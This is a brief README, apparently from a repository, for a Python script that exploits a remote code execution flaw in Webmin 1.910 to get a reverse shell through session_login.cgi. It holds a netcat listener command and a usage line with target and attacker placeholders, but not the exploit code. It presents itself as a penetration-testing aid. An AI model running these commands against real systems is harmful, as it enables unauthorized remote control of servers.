
Webmin 1.910 Remote Code Execution Exploit
Webmin 1.910 Remote Code Execution Exploit
This repository contains a Python 3 script designed to exploit a remote code execution vulnerability in Webmin version 1.910. The script utilizes the session_login.cgi endpoint to perform authentication and deploy a reverse shell payload, granting remote access to the target system. This exploit is intended for authorized penetration testing and educational purposes.
nc -lvnp <lport>
python3 webmin_exploit.py --rhost <target_ip> --lhost <your_ip> --lport <your_port> -u <username> -p <password>

